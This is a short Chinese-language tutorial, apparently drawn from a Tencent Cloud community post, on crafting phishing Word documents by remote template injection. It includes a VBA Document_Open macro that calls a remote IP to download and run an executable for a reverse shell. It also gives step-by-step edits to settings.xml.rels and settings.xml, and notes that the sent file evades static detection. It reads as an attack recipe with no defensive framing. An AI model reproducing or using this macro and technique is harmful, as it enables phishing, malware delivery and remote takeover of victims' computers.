Office关系模板注入
Office关系模板注入
干货 | Office文档钓鱼的实战和免杀技巧-腾讯云开发者社区-腾讯云 (tencent.com)
- 测试环境: Win10+Office365
利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。
发送的文档本身不带恶意代码,所以能过很多静态检测。只需要在远程DOTM文档中编写宏病毒或者木马即可。
制作一个宏钓鱼的文档挂载到 HTTP 服务器上, 例如前面的 VBA 宏调 Powershell 下载与执行文件达成反弹shell
Private Sub Document_Open()
Call Shell(Environ$("COMSPEC") & " /c powershell.exe curl http://100.1.1.131:8000/download/msedge.exe -o msedge.exe && msedge.exe", vbNormalFocus)
End Sub
选定目标 word 文档后将其后缀名改成 .zip
并解压
整体目录结构如下:
制作关系模板注入文档主要需要修改两个文件
\word\_rels\settings.xml.rels
一般
word/_rels
文档里可能只有document.xml.rels
没有settings.xml.rels
, 此时需要新建一个settings.xml.rels
文档几个关键点
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
最后一定要是
attachedTemplate
定义关系模板TargetMode
要是External
外部模板定义
\word\settings.xml
在
w:settings
属性中定义外部模板
将目录重新打包成 zip 并重命名为 docx 文档
到这里模板注入的钓鱼文档就制作好了, 但是由于这里外联模板直接填的ip是不受信任的, 因此这里即便打开了也不会正常加载外部模板, 需要添加受信任站点
打开 Internet选项->受信任的站点->站点
添加目标主机即可
打开该文档便会下载外部模板文档并执行宏代码达成反弹shell: